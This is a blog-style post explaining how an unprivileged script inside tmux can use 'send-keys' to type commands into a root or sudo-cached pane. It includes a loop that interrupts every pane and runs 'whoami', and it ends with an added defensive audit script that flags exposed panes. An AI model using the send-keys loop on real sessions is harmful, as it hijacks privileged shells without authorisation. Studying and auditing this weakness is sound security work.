tmux privilege escalation abusing send-keys

A script run as an unprivileged user inside tmux can, under some circumstances, execute commands as root.


Did you know you can send keystrokes to other panes in tmux?
You can abuse send-keys to send commands to a root/sudo pane.
That's all there is to it, that's the trick.


There's a tmux feature to send keystrokes to a pane.
For example, tmux send-keys -t $pane 'C-c' sends Ctrl-C to pane $pane, which delivers SIGINT to whatever is running there.

man tmux

When I saw the send-keys feature, I was like:
"What if there's another pane, where the user is logged in as root?"



tmux sp   # split the window into a second pane
su        # log in as root in the new pane

Now go back to the other tmux pane (where you are logged in as user).


Now run the following script, to execute whoami in every pane:

for pane in `tmux list-panes | grep -Po '^\d+'`; do
    # interrupt whatever is running in the pane
    tmux send-keys -t "$pane" 'C-c'
    # type the command and press Enter
    tmux send-keys -t "$pane" 'whoami' Enter
done

You will see that, as expected, whoami returned root in the pane where you are logged in as root.


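With the same trick you can abuse the fact that sudo was used in another pane: if sudo's cached credentials for that pane are still valid, it does not ask for the password again.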

tmux send-keys -t "$pane" 'sudo whoami' Enter
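
To check your own tmux server for panes exposed to this, the following audit lists every pane whose terminal hosts a process owned by another UID. It is an added example, not code from the original post; the function names and the sample data (sample_procs, UID 1000, /dev/pts/1 and /dev/pts/2) are constructed for illustration.

```sh
# Flags tmux panes whose terminal hosts a process owned by another UID
# (for example a root shell started with su or sudo -s). Anything that can
# run `tmux send-keys` against this server can type into those panes.
# Only live processes are seen; cached sudo credentials are not detected.

# "pane_id tty" for every pane on the server.
list_panes() { tmux list-panes -a -F '#{pane_id} #{pane_tty}'; }

# "uid comm" for every process attached to a tty.
procs_on_tty() { ps -o uid=,comm= -t "${1#/dev/}"; }

# Constructed sample that stands in for procs_on_tty outside tmux.
sample_procs() {
  case "$1" in
    /dev/pts/1) printf '1000 bash\n1000 vim\n' ;;
    /dev/pts/2) printf '1000 bash\n   0 su\n   0 bash\n' ;;
  esac
}

# audit_panes MY_UID [LOOKUP]: reads "pane_id tty" lines on stdin and
# prints one line per process whose UID differs from MY_UID.
audit_panes() {
  my_uid=$1
  lookup=${2:-procs_on_tty}
  while read -r pane tty; do
    [ -n "$tty" ] || continue
    "$lookup" "$tty" </dev/null | while read -r uid comm; do
      [ -n "$uid" ] || continue
      if [ "$uid" != "$my_uid" ]; then
        echo "$pane $tty uid=$uid $comm"
      fi
    done
  done
}

if [ -n "${TMUX:-}" ]; then
  # Inside tmux: audit the real server.
  list_panes | audit_panes "$(id -u)"
else
  # Outside tmux: run against the constructed sample.
  printf '%%0 /dev/pts/1\n%%1 /dev/pts/2\n' | audit_panes 1000 sample_procs
fi
```

Any pane it reports should be closed, or the root shell moved to a tmux server that unprivileged processes cannot reach.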
